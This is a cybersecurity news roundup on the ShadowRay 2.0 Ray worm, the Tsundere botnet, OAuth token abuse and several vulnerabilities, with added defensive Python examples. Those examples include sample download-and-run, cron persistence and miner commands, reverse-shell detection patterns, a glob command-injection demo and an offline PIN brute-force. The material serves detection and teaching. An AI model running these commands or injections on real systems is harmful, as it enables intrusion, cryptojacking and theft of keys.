But it’s not clear at this stage whether the earlier breach played a role in the current incident. In that hack, the attackers accessed business contact details for Salesforce-related content, including names, business email addresses, phone numbers, regional/location details, product licensing information, and support case contents (without attachments). “Adversaries are increasingly targeting the OAuth tokens of trusted third-party SaaS integrations,” Larsen pointed out. In light of the malicious activity, organizations are advised to review all third-party applications connected to Salesforce, revoke tokens for unused or suspicious applications, and rotate credentials if anomalies are flagged from an integration.
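The review that Larsen recommends can be scripted against the org's own token inventory. The following is an added example, not code from Salesforce, Gainsight or GTIG: it takes the rows a SOQL query against the OauthToken object would return (the object and its field names AppName, UserId, CreatedDate, LastUsedDate and UseCount are an assumption about the Salesforce API; check them against your API version) and flags tokens to revoke or investigate. The records in SAMPLE_TOKENS are constructed, not data from any real org.

```python
"""Triage of connected-app OAuth tokens in a Salesforce org after a third-party
integration is suspected of compromise.

Added example, not code from Salesforce, Gainsight or GTIG. Assumed input: rows
from a SOQL query such as

    SELECT Id, AppName, UserId, CreatedDate, LastUsedDate, UseCount FROM OauthToken

(the OauthToken object and these field names are assumptions; verify against your
API version). SAMPLE_TOKENS is constructed data.
"""
from datetime import datetime, timedelta, timezone

# Fixed reference time so the demo is reproducible (assumption: run on this date).
NOW = datetime(2025, 11, 21, 12, 0, tzinfo=timezone.utc)

# Constructed sample rows, in the shape the REST API returns them.
SAMPLE_TOKENS = [
    {"Id": "0t1", "AppName": "Gainsight", "UserId": "005A", "UseCount": 48210,
     "CreatedDate": "2024-02-01T10:00:00.000+0000", "LastUsedDate": "2025-11-20T03:14:00.000+0000"},
    {"Id": "0t2", "AppName": "Slack", "UserId": "005B", "UseCount": 1200,
     "CreatedDate": "2025-01-10T10:00:00.000+0000", "LastUsedDate": "2025-11-19T09:00:00.000+0000"},
    {"Id": "0t3", "AppName": "Old Reporting Connector", "UserId": "005C", "UseCount": 15,
     "CreatedDate": "2024-06-01T10:00:00.000+0000", "LastUsedDate": "2025-03-02T12:00:00.000+0000"},
    {"Id": "0t4", "AppName": "Gainsight", "UserId": "005D", "UseCount": 9,
     "CreatedDate": "2025-11-21T00:58:00.000+0000", "LastUsedDate": "2025-11-21T01:00:00.000+0000"},
]


def parse_sf_datetime(value):
    """Salesforce renders datetimes as 2025-11-20T03:14:00.000+0000."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")


def triage_tokens(tokens, publishers_under_review, now=NOW, stale_days=90, fresh_hours=24):
    """Return one finding per token that should be revoked or investigated.

    - any token for an app from a publisher under review (revoke, as Salesforce did)
    - tokens unused for `stale_days` (revoke: an idle integration is pure attack surface)
    - tokens minted within `fresh_hours` (investigate: a new token during an incident
      can mean stolen client credentials were used to re-authorize the app)
    """
    findings = []
    for tok in tokens:
        reasons = []
        app = tok["AppName"]
        if any(p.lower() in app.lower() for p in publishers_under_review):
            reasons.append("publisher under review: revoke, re-authorize only after the vendor all-clear")
        if now - parse_sf_datetime(tok["LastUsedDate"]) > timedelta(days=stale_days):
            reasons.append(f"unused for more than {stale_days} days: revoke")
        if now - parse_sf_datetime(tok["CreatedDate"]) < timedelta(hours=fresh_hours):
            reasons.append(f"issued within the last {fresh_hours} hours: confirm who authorized it")
        if reasons:
            findings.append({"Id": tok["Id"], "AppName": app, "UserId": tok["UserId"],
                             "UseCount": tok["UseCount"], "reasons": reasons})
    return findings


def per_app_usage(tokens):
    """Total API use per app, to spot an integration whose call volume is out of line
    with what it is supposed to do (a customer-success tool pulling every record)."""
    totals = {}
    for tok in tokens:
        totals[tok["AppName"]] = totals.get(tok["AppName"], 0) + tok["UseCount"]
    return totals


if __name__ == "__main__":
    for f in triage_tokens(SAMPLE_TOKENS, ["Gainsight"]):
        print(f["Id"], f["AppName"], f["UserId"], "; ".join(f["reasons"]))
    print(per_app_usage(SAMPLE_TOKENS))
```

Revocation itself happens in Setup under Connected Apps OAuth Usage or through the API; the point of the script is to turn the advisory's advice into a repeatable list rather than a one-off click-through, and to keep the usage totals so a later spike from the same app stands out.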


ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave observed between September 2023 and March 2024. At its core, the attack exploits a critical missing-authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched because of a “long-standing design decision” consistent with Ray’s development best practices, which require it to be run in an isolated network and to act only upon trusted code.

The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to the unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray-and-pray attacks to distribute the payloads to other Ray dashboards, creating a worm that spreads from one victim to the next. The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible.

However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations. The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts. The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said. The campaign has likely made use of large language models (LLMs) to create the GitLab payloads.

This assessment is based on the malware’s “structure, comments, and error handling patterns.” The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host. Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.

While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors, who can identify which Ray dashboard IP addresses are exploitable using the open-source out-of-band interaction tool interact.sh. More than 230,500 Ray servers are publicly accessible. Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the configuration of clusters and prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization in front of the Ray Dashboard port (8265 by default).
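Because the same unauthenticated Job Submission API the attackers abuse also lists every job ever submitted, a defender who finds an exposed dashboard can triage it from the job list. The following is an added example, not code from Ray, Anyscale or Oligo: it reads the JSON that a head node returns for GET /api/jobs/ and scores each entrypoint against the tradecraft described above (remote script piped to a shell, payloads fetched from GitHub/GitLab, a cron re-infection schedule, XMRig/pool traffic, killing rival miners, kworker impersonation). The field names follow Ray's JobDetails model as an assumption, and SAMPLE_JOBS is constructed, not captured from any real cluster.

```python
"""Triage of jobs submitted through a Ray dashboard's Job Submission API.

Added example, not code from Ray, Anyscale or Oligo. It consumes the JSON list a
head node returns for GET http://<head>:8265/api/jobs/ and flags entrypoints
matching the ShadowRay tradecraft. Field names (entrypoint, submission_id,
status, start_time) follow Ray's JobDetails model as an assumption; SAMPLE_JOBS
is constructed data.
"""
import json
import re
import urllib.request

# Each pattern corresponds to a behaviour named in the campaign write-up.
INDICATORS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"),
    "code_hosting_raw": re.compile(r"raw\.githubusercontent\.com|gitlab\.com/\S+/-/raw/|github\.com/\S+/raw/"),
    "cron_persistence": re.compile(r"\bcrontab\b|/etc/cron|\*/\d+ \* \* \* \*"),
    "miner": re.compile(r"\b(xmrig|monero)\b|stratum\+tcp|:3333\b"),
    "reverse_shell": re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bbash -i\b", re.S),
    "kill_competitors": re.compile(r"\b(pkill|killall)\b.*\b(xmrig|miner|kinsing|kdevtmpfsi)\b", re.S),
    "kernel_disguise": re.compile(r"\[?kworker"),
    "base64_stage": re.compile(r"\bbase64\b\s+(-d|--decode)\b"),
}

# Constructed sample of what /api/jobs/ returns: one legitimate training job and
# two in the style of the campaign (placeholder URLs and pool host, not real IOCs).
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_train01", "status": "RUNNING", "start_time": 1763700000000,
     "entrypoint": "python train.py --epochs 10 --batch-size 64"},
    {"submission_id": "raysubmit_b7d2", "status": "SUCCEEDED", "start_time": 1763701200000,
     "entrypoint": 'bash -c "curl -s https://gitlab.com/example-group/example-project/-/raw/main/r.sh | bash"'},
    {"submission_id": "raysubmit_c9e1", "status": "RUNNING", "start_time": 1763701800000,
     "entrypoint": ("python -c \"import os; os.system('(crontab -l; echo \\\"*/15 * * * * curl -s "
                    "https://gitlab.com/example-group/example-project/-/raw/main/r.sh | sh\\\") | crontab -; "
                    "pkill -f xmrig; nohup ./kworker/0:1 -o stratum+tcp://pool.example.invalid:3333 "
                    ">/dev/null 2>&1 &')\"")},
]


def scan_entrypoint(entrypoint):
    """Names of every indicator that matches the job's entrypoint string."""
    return [name for name, rx in INDICATORS.items() if rx.search(entrypoint)]


def triage_jobs(jobs):
    """Return one finding per suspicious job, most indicators first."""
    findings = []
    for job in jobs:
        hits = scan_entrypoint(job.get("entrypoint", ""))
        if hits:
            findings.append({
                "submission_id": job.get("submission_id"),
                "status": job.get("status"),
                "start_time": job.get("start_time"),
                "indicators": hits,
                "entrypoint": job.get("entrypoint", "")[:160],
            })
    findings.sort(key=lambda f: len(f["indicators"]), reverse=True)
    return findings


def fetch_jobs(dashboard_url, timeout=5):
    """Pull the job list from a cluster you operate (network call; the offline demo
    below uses SAMPLE_JOBS instead)."""
    with urllib.request.urlopen(f"{dashboard_url.rstrip('/')}/api/jobs/", timeout=timeout) as resp:
        return json.load(resp)


if __name__ == "__main__":
    for f in triage_jobs(SAMPLE_JOBS):
        print(f["submission_id"], f["status"], ",".join(f["indicators"]))
        print("   ", f["entrypoint"])
```

A hit on any single indicator is worth a look; the cron-plus-miner combination is the re-infection loop the report describes and means the host, not just the job, needs rebuilding. The underlying exposure is usually the head node having been started with the dashboard bound to all interfaces (Ray's default is to bind it to 127.0.0.1), so the check that complements this triage is whether port 8265 answers from outside the cluster network at all.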

“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said. “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.

The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”

Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows

Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users. Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today. There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site. The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using game-related lures.

It’s possible that users searching for pirated versions of these games are the target. Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command. “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained.

“Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.” Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies. While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself. The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract . The contract was created on September 23, 2024, and has had 26 transactions to date.

Once the C2 address is retrieved, the bot checks that it is a valid WebSocket URL, then establishes a WebSocket connection to that address and receives JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period. “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said. The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point in time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.
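The blockchain lookup is what makes the C2 rotatable without touching the bots, and it is also what lets a defender resolve the current C2 with nothing more than a public Ethereum node. The following is an added example, not Kaspersky's or the botnet's code (the bot uses the ethers library; here the eth_call result is encoded and decoded by hand so the example runs offline). The contract interface assumed, a view function returning a single string, the selector, the contract address and the ws://192.0.2.10:3011 value are all constructed placeholders in the format the article reports; the validation step stands in for the bot's own WebSocket URL check.

```python
"""Reading a C2 address out of an Ethereum contract, and validating it.

Added example, not Kaspersky's or the botnet's code. Assumptions: the contract
exposes a view function that returns a single ABI `string`; its 4-byte selector
is supplied by the caller (keccak256 of the signature, which Python's hashlib
cannot compute: sha3_256 is NIST SHA-3, not keccak). All values are placeholders.
"""
from urllib.parse import urlsplit


def abi_encode_string(text):
    """ABI-encode one dynamic `string` return value: offset word, length word, data padded to 32 bytes."""
    data = text.encode()
    padded = data + b"\x00" * (-len(data) % 32)
    return (32).to_bytes(32, "big") + len(data).to_bytes(32, "big") + padded


def abi_decode_string(blob):
    """Inverse of abi_encode_string, with the bounds checks a resolver needs
    because the contract owner controls every byte of the response."""
    if len(blob) < 64:
        raise ValueError("response too short for a string return")
    offset = int.from_bytes(blob[:32], "big")
    if offset + 32 > len(blob):
        raise ValueError("offset points outside the response")
    length = int.from_bytes(blob[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(blob):
        raise ValueError("string length exceeds the response")
    return blob[start:start + length].decode("utf-8")


def eth_call_request(contract_address, selector_hex, request_id=1):
    """JSON-RPC body a resolver (bot or analyst) POSTs to any Ethereum node."""
    return {"jsonrpc": "2.0", "id": request_id, "method": "eth_call",
            "params": [{"to": contract_address, "data": selector_hex}, "latest"]}


def c2_from_eth_call_result(result_hex):
    """Turn the `result` field of an eth_call response into the C2 string."""
    hexdata = result_hex[2:] if result_hex.startswith("0x") else result_hex
    return abi_decode_string(bytes.fromhex(hexdata))


def is_valid_ws_c2(url):
    """The kind of check the bot performs before connecting: ws/wss scheme and a host."""
    try:
        parts = urlsplit(url)
        parts.port  # raises ValueError for a malformed port
    except ValueError:
        return False
    return parts.scheme in ("ws", "wss") and bool(parts.hostname)


if __name__ == "__main__":
    # Placeholder contract and selector (assumptions, not the real ones).
    req = eth_call_request("0x" + "00" * 20, "0xdeadbeef")
    # Constructed node response, as if the contract currently returned this C2.
    fake_result = "0x" + abi_encode_string("ws://192.0.2.10:3011").hex()
    c2 = c2_from_eth_call_result(fake_result)
    print(req["method"], "->", c2, "valid:", is_valid_ws_c2(c2))
```

For tracking, the useful move is to issue the same eth_call on a schedule and record every distinct value the contract returns, since each C2 change is a transaction on a public ledger; the 26 transactions the report counts are that history. On the egress side, WebSocket connections from node.exe to bare IP addresses on non-standard ports are the traffic to hunt for.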

Exactly who is behind Tsundere is not known, but the presence of Russian-language logging strings in the source code points to a Russian-speaking threat actor. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024. What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team.

Another clue that points to its Russian origins is that customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time. “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said.


ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves

This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs.

Even simple things like browser add-ons and smart home gadgets are being used to attack people. Every day, there’s a new story that shows how quickly things are changing in the fight over the internet. Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security.

Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections. All these stories remind us: the same tech that makes life better can very easily be turned into a weapon. Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.

Chinese operatives mine LinkedIn for political intel
MI5 Warns of Chinese Spies Using LinkedIn to Gather Intel on Lawmakers

The U.K.’s domestic intelligence agency MI5 has warned lawmakers that Chinese spies are actively reaching out to “recruit and cultivate” them with lucrative job offers on LinkedIn via headhunters or cover companies. Chinese nationals are said to be using LinkedIn profiles to conduct outreach at scale, allegedly on behalf of the Chinese Ministry of State Security. “Their aim is to collect information and lay the groundwork for long-term relationships, using professional networking sites, recruitment agents and consultants acting on their behalf,” House of Commons Speaker Sir Lindsay Hoyle said. The activity is assessed to be “targeted and widespread.” Targets included parliamentary staff, economists, think tank consultants, and government officials.

In a statement shared with the BBC, a spokesperson for the Chinese embassy in the U.K. said the accusations of espionage were “pure fabrication” and accused the U.K. of a “self-staged charade.” MI5 is not the only intelligence agency to warn about social media’s potential for spying. In July, Mike Burgess, the Director-General of the Australian Security Intelligence Organisation (ASIO), said a foreign intelligence service tried to obtain information about an Australian military project by cultivating relationships with people who worked on it.

EU rewires privacy playbook
E.U. Floats Proposal for GDPR Changes

The European Commission has unveiled a proposal for major changes to the European Union’s General Data Protection Regulation (GDPR) and AI Act. Under the new “digital omnibus” package, the E.U. aims to simplify the GDPR and “clarify the definition of personal data” so that companies can lawfully process personal data for AI training on the basis of “legitimate interest,” without prior consent from users, as long as they do not break any other laws. The move has been criticized for pandering to Big Tech’s interests.

It also amends cookie consent rules on websites, allowing users to “indicate their consent with one-click and save their cookie preferences through central settings of preferences in browsers and operating systems” instead of having to confirm their choice on every website they visit. “Taken together, these changes give both state authorities and powerful companies more room to collect and process personal information with limited oversight and reduced transparency,” European Digital Rights (EDRi) said. “People will lose straightforward safeguards, and minoritised communities will face even higher exposure to profiling, automated decisions and intrusive monitoring.” Austrian privacy non-profit noyb said the changes “are not ‘maintaining the highest level of personal data protection,’ but massively lower protections for Europeans.”

Browser add-ons turned into data siphons
Malicious Browser Extensions Steal Data

Threat actors are leveraging malicious VPN and ad-blocking extensions for Google Chrome and Microsoft Edge to steal sensitive data. The extensions were collectively installed about 31,000 times.

Once installed, the extensions could intercept and redirect every web page a user visited, collect browsing data and the list of installed extensions, modify or disable other proxy or security tools, and route traffic through attacker-controlled servers, LayerX said. The names of some of the extensions are VPN Professional: Free Unlimited VPN Proxy, Free Unlimited VPN, VPN-free.pro - Free Unlimited VPN for Secure Browsing, Ads Blocker - Block All Ads & Protect Privacy, and Ads Cleaner for Facebook.

Crypto launderer’s luxury spree unravels
California Man Pleads Guilty to Laundering Crypto Stolen in $230M Scam

A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam. Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in the scheme following charges brought by the Department of Justice in May 2025.

The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S. Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said.

“To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee.

Critical Oracle bug opens door to full system takeover
Security Flaw in Oracle Identity Manager

Cybersecurity researchers have disclosed details of a critical security flaw in the Identity Manager product of Oracle Fusion Middleware (CVE-2025-61757, CVSS score: 9.8) that allows an unauthenticated attacker with network access via HTTP to compromise and take control of susceptible systems.

The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. “This pre-authentication RCE we found would also have been able to breach login.us2.oraclecloud.com, as it was running both OAM and OIM,” Searchlight Cyber’s Adam Kues and Shubham Shah said . “The vulnerability our team discovered follows a familiar pattern in Java: filters designed to restrict authentication often contain easy-to-exploit authentication bypass flaws. Logical flaws in how Java interprets request URIs are a gift that continues giving when paired with matrix parameters.” Oracle addressed the vulnerability last month.

Smart relay flaw triggers repeat reboots
Security Flaw in Shelly Pro 4PM Smart Relay

A critical security flaw in the Shelly Pro 4PM smart relay (CVE-2025-11243, CVSS score: 8.3) could be exploited by an attacker to cause a device reboot, limiting the ability to detect abnormal power consumption or exposing circuits to undesirable safety risks. “Unexpected inputs to multiple JSON-RPC methods on the Shelly Pro 4PM v1.4.4 can exhaust resources and trigger device reboots,” Nozomi Networks said. “While the issue does not enable code execution or data theft, it can be used to systematically cause repeatable outages—impacting automation routines and visibility in both home and building contexts.” Users are advised to update to version 1.6.0 and avoid direct internet exposure.

Crypto mixer founders jailed for laundering millions
Samourai Wallet Co-Founders Get Multi-Year Prison Term

Keonne Rodriguez and William Lonergan Hill, co-founders of the crypto mixing service Samourai Wallet, were sentenced to five and four years in prison, respectively, for their role in facilitating over $237 million in illegal transactions.

Both defendants pleaded guilty to charges of knowingly transmitting criminal proceeds back in August 2025. The defendants, per U.S. prosecutors, designed Samourai around the Bitcoin mixing services known as Whirlpool and Ricochet to conceal the nature of illicit transactions. “Over $237 million of criminal proceeds laundered through Samourai came from, among other things, drug trafficking, darknet marketplaces, cyber-intrusions, frauds, sanctioned jurisdictions, murder-for-hire schemes, and a child pornography website,” the U.S. Justice Department said.

glob CLI flaw opens door to code injection
Security Flaw in glob CLI

A security flaw (CVE-2025-64756, CVSS score: 7.5) has been identified in the glob CLI’s -c/--cmd flag that could result in operating system command injection, leading to remote code execution. “When glob -c is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges,” the glob maintainers said in an alert. An attacker could leverage the flaw to execute arbitrary commands, compromising a developer’s machine or paving the way for supply chain poisoning via malicious packages.
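The defect is the general one of handing a file name to a shell as part of a command string, and it is easiest to see side by side with the safe form. The following is an added example, not glob's code: Python's subprocess stands in for Node's child_process with shell: true, a file whose name contains $(...) is created in a temporary directory (constructed input), and the same per-match command is run both ways. The hardened version here passes the name as a separate argv element; how the upstream fix was implemented is not described in the advisory text above, so that is not a claim about the patch.

```python
"""The glob -c defect reproduced in Python beside its hardened form.

Added example, not glob's code. subprocess with shell=True models Node's
child_process with shell: true. POSIX /bin/sh is assumed. The hostile file name
is constructed in a temp dir; `echo` is used as the per-match command so the
injection is visible in stdout instead of doing damage.
"""
import pathlib
import shlex
import subprocess
import tempfile


def run_per_match_vulnerable(cmd, paths):
    """Mirrors `glob -c <cmd>` before the fix: the matched name is interpolated into
    a single command line that a shell parses, so $(...), backticks, ; and | in the
    file name are executed, not treated as part of the name."""
    outputs = []
    for p in paths:
        r = subprocess.run(f"{cmd} {p}", shell=True, capture_output=True, text=True)
        outputs.append(r.stdout.strip())
    return outputs


def run_per_match_safe(cmd, paths):
    """Hardened form: split the operator-supplied command once, then pass each match
    as its own argv element. No shell sees the file name, so metacharacters in it
    reach the program as literal bytes."""
    argv = shlex.split(cmd)
    outputs = []
    for p in paths:
        r = subprocess.run([*argv, str(p)], capture_output=True, text=True)
        outputs.append(r.stdout.strip())
    return outputs


def demo(command="echo"):
    """Create a file named '$(echo INJECTED).txt', glob it, run both variants.
    Returns (vulnerable_output, safe_output) for the single match."""
    with tempfile.TemporaryDirectory() as d:
        hostile = pathlib.Path(d) / "$(echo INJECTED).txt"
        hostile.write_text("")
        matches = sorted(pathlib.Path(d).glob("*.txt"))
        vulnerable = run_per_match_vulnerable(command, matches)
        safe = run_per_match_safe(command, matches)
    return vulnerable, safe


if __name__ == "__main__":
    v, s = demo()
    print("shell=True :", v[0])   # the $(...) ran: name comes back as .../INJECTED.txt
    print("argv list  :", s[0])   # name passed through untouched
```

In a CI job the attacker does not need to control the command, only a file name in the checkout, which is exactly the supply-chain angle the advisory raises: a malicious package or pull request that adds a file called something like `$(curl ...|sh).js` turns a routine `glob -c` into code execution on the build runner.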

The vulnerability affects glob versions 10.2.0 through 11.0.3. It has been patched in versions 10.5.0, 11.1.0, and 12.0.0. According to AISLE, which discovered and reported the flaw along with Gyde04, “you are not affected if you only use glob’s library API (glob(), globSync(), async iterators) without invoking the CLI tool.”

Russian cyber operative caught in Phuket
Russian Hacker Wanted by U.S. Arrested in Thailand

A Russian national alleged to be affiliated with the Void Blizzard (aka Laundry Bear) hacking group has been arrested in Phuket, according to CNN.

Denis Obrezko, 35, was arrested on November 6, 2025, as part of a joint operation between the U.S. Federal Bureau of Investigation (FBI) and Thai officials. He was arrested a week after entering the country on a flight to Phuket. Earlier this May, Microsoft attributed Void Blizzard to espionage operations targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America, since at least April 2024.

X debuts encrypted messaging with PIN-secured keys
X Rolls Out Encrypted Chat

X has revealed Chat, an encrypted upgrade to the platform’s direct messaging service with support for video and voice calls, disappearing messages, and file sharing. In an X post, the social media platform said users can block screenshots and get notified of attempts. X first began rolling out encrypted DMs in May 2023 before pausing the feature on May 29, 2025, to make some improvements. “When entering Chat for the first time, a private-public key pair is created specific to each user,” the company said.
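X's description of the key handling (a per-user key pair whose private half is kept on X's infrastructure under a PIN that never leaves the device, and is recoverable from any device by whoever knows the PIN) is a PIN-wrapped key escrow, and the property a practitioner wants to check is what the holder of the stored blob can do with it. The following is an added example, not X's code: X has not published its construction, so the KDF, the wrapping scheme and the parameters here are assumptions chosen to be standard-library only (PBKDF2-HMAC-SHA256 to derive a key-encryption key, an HMAC-based keystream plus an HMAC tag in place of a real AEAD). It wraps a constructed private key under a 4-digit PIN, recovers it, and then shows that whoever holds the blob can find the PIN offline by trial.

```python
"""PIN-wrapped private-key escrow, and why the blob holder can brute-force it.

Added example, not X's code; X's actual KDF, cipher, iteration count and any
server-side attempt limiting are not described in its statement. Scheme used here
(assumption): kek = PBKDF2-HMAC-SHA256(PIN, salt); separate encryption and MAC
keys are derived from kek; the private key is XORed with an HMAC-SHA256 counter
keystream and the result is authenticated with HMAC (encrypt-then-MAC, standing
in for AES-GCM). The private key is a constructed 32-byte value.
"""
import hashlib
import hmac
import os

ITERATIONS = 2_000  # deliberately low so the brute-force demo runs in seconds; real deployments use far more


def derive_kek(pin, salt, iterations=ITERATIONS):
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, iterations, dklen=32)


def _subkeys(kek):
    enc_key = hmac.new(kek, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(kek, b"mac", hashlib.sha256).digest()
    return enc_key, mac_key


def _keystream(enc_key, nonce, length):
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def wrap_private_key(pin, private_key):
    """What the device uploads: the server learns salt, nonce, ciphertext and tag, never the PIN."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = _subkeys(derive_kek(pin, salt))
    ct = bytes(a ^ b for a, b in zip(private_key, _keystream(enc_key, nonce, len(private_key))))
    tag = hmac.new(mac_key, b"wrap" + nonce + ct, hashlib.sha256).digest()
    return {"salt": salt, "nonce": nonce, "ct": ct, "tag": tag}


def unwrap_private_key(pin, blob):
    """Recovery on a new device: returns the key, or None for a wrong PIN or a tampered blob."""
    enc_key, mac_key = _subkeys(derive_kek(pin, blob["salt"]))
    expected = hmac.new(mac_key, b"wrap" + blob["nonce"] + blob["ct"], hashlib.sha256).digest()
    if not hmac.compare_digest(expected, blob["tag"]):
        return None
    return bytes(a ^ b for a, b in zip(blob["ct"], _keystream(enc_key, blob["nonce"], len(blob["ct"]))))


def brute_force_pin(blob, digits=4):
    """Anyone holding the blob (the operator, or whoever steals it) can test every PIN
    offline; nothing in the blob itself limits the number of attempts."""
    tries = 0
    for n in range(10 ** digits):
        pin = f"{n:0{digits}d}"
        tries += 1
        if unwrap_private_key(pin, blob) is not None:
            return pin, tries
    return None, tries


if __name__ == "__main__":
    private_key = os.urandom(32)          # constructed stand-in for the user's private key
    blob = wrap_private_key("0427", private_key)
    assert unwrap_private_key("0427", blob) == private_key
    pin, tries = brute_force_pin(blob)
    print(f"recovered PIN {pin} after {tries} PBKDF2 evaluations")
```

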